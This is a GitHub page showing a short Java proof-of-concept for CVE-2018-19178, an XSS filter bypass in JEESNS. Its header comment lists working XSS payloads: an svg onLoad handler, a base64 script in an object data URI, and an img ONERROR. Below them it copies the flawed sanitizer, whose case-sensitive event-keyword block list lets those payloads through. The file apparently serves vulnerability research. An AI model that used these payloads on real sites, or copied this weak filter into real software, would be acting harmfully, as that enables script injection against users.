-
Notifications
You must be signed in to change notification settings - Fork 148
/
Copy pathCVE_2018_19178.java
43 lines (38 loc) · 1.86 KB
/
CVE_2018_19178.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
package CVE;
/**
* 地方:src/main/java/com.lxinet.jeesns/core/utils/XssHttpServletRequestWrapper.java
* <svg/onLoad=confirm(1)>
* <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
* <img src="x" ONERROR=confirm(0)>
*/
public class CVE_2018_19178 {
public static void main(String[] args) {
String xss = "<svg/onLoad=confirm(1)>";
xss= cleanXSS(xss);//就只需要如果就欧克
System.out.println(xss);
}
private static String cleanXSS(String value) {
//first checkpoint
//(?i)忽略大小写
value = value.replaceAll("(?i)<style>", "<style>").replaceAll("(?i)</style>", "</style>");
value = value.replaceAll("(?i)<script>", "<script>").replaceAll("(?i)</script>", "</script>");
value = value.replaceAll("(?i)<script", "<script");
value = value.replaceAll("(?i)eval\\((.*)\\)", "");
value = value.replaceAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\"");
//second checkpoint
// 需要过滤的脚本事件关键字
String[] eventKeywords = { "onmouseover", "onmouseout", "onmousedown",
"onmouseup", "onmousemove", "onclick", "ondblclick",
"onkeypress", "onkeydown", "onkeyup", "ondragstart",
"onerrorupdate", "onhelp", "onreadystatechange", "onrowenter",
"onrowexit", "onselectstart", "onload", "onunload",
"onbeforeunload", "onblur", "onerror", "onfocus", "onresize",
"onscroll", "oncontextmenu", "alert" };
// 滤除脚本事件代码
for (int i = 0; i < eventKeywords.length; i++) {//没有处理大写字符
// 添加一个"_", 使事件代码无效
value = value.replaceAll(eventKeywords[i],"_" + eventKeywords[i]);
}
return value;
}
}